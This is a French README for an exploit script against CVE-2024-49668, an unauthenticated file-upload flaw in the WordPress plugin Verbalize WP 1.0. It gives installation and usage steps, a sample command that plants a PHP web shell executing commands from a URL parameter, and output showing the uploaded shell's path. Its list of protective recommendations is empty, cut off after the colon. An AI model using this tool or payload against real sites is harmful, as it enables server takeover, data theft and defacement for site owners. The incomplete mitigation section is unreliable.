
Plugin WordPress Verbalize WP <= 1.0 - Vulnérabilité de téléchargement de fichier arbitraire
CVE-2024-49668 est une vulnérabilité critique dans le plugin WordPress Verbalize WP versions 1.0 et inférieures. Cette vulnérabilité permet à des attaquants non authentifiés de télécharger des fichiers arbitraires, y compris des shells web, sur le serveur web. Le problème provient d'une validation insuffisante des entrées et des restrictions de type de fichier lors du téléchargement de fichiers.
Ce script Python exploite la vulnérabilité CVE-2024-49668 pour télécharger un fichier shell sur le site WordPress cible en utilisant le plugin Verbalize WP.
readme.txt.requestsInstallez la bibliothèque requise avec pip :
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
Exécute une requête POST vers un site WordPress.
options:
-h, --help affiche ce message d'aide et quitte
-u, --url URL URL cible
-s, --shell SHELL Code shell à télécharger
Par défaut, le script télécharge un shell PHP qui exécute phpinfo().
python CVE-2024-49668.py -u http://target.com
Vous pouvez également spécifier un code PHP shell personnalisé à télécharger :
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
Le site est vulnérable. Exploitation de la version : 1.0. Téléchargement du fichier en cours...
Chemin du shell : /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By : Nxploit, Khaled ALenazi
La vulnérabilité CVE-2024-49668 permet aux attaquants de prendre le contrôle total du serveur cible en téléchargeant des fichiers malveillants. L'exploitation de cette vulnérabilité peut entraîner de graves conséquences, notamment des violations de données, un accès non autorisé et une éventuelle défiguration du site web.
Pour protéger votre site WordPress contre cette vulnérabilité, il est recommandé de :
Cet outil est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de cet outil contre des sites web sans l'autorisation explicite du propriétaire est illégale. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
Créé le 22 mars 2025 par Nxploited , Khaled alenazi